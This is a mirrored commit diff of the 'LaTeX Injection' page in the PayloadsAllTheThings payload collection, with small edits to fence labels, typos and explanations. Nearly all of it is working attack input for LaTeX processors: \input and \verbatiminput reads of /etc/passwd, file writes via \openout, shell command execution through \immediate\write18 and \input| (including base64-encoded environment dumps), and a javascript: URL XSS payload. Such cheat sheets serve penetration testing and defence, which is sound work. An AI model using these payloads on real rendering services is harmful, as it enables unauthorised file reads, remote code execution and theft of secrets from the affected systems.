ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Podalirius 2021-09-29 07:28:11 +02:00 committed by GitHub
parent 71988cfb40
commit 1865b8a85b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
LaTeX Injection/README.md
View File

@ -2,14 +2,16 @@
## Read file
```bash
Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd}
\include{password} # load .tex file
\include{somefile} # load .tex file (somefile.tex)
```
Read single lined file
Read single lined file:
```bash
```tex
\newread\file
\openin\file=/etc/issue
\read\file to\line
@ -17,9 +19,9 @@ Read single lined file
\closein\file
```
Read multiple lined file
Read multiple lined file:
```bash
```tex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
@ -29,47 +31,52 @@ Read multiple lined file
\closein\file
```
Read text file, keep the formatting
Read text file, **without** interpreting the content, it will only paste raw file content:
```bash
```tex
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
## Write file
```bash
Write single lined file:
```tex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
```
## Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
```bash
\immediate\write18{env > output}
```tex
\immediate\write18{id > output}
\input{output}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
```bash
```tex
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
```tex
\input|ls|base64
\input{|"/bin/hostname"}
```
## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
```tex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)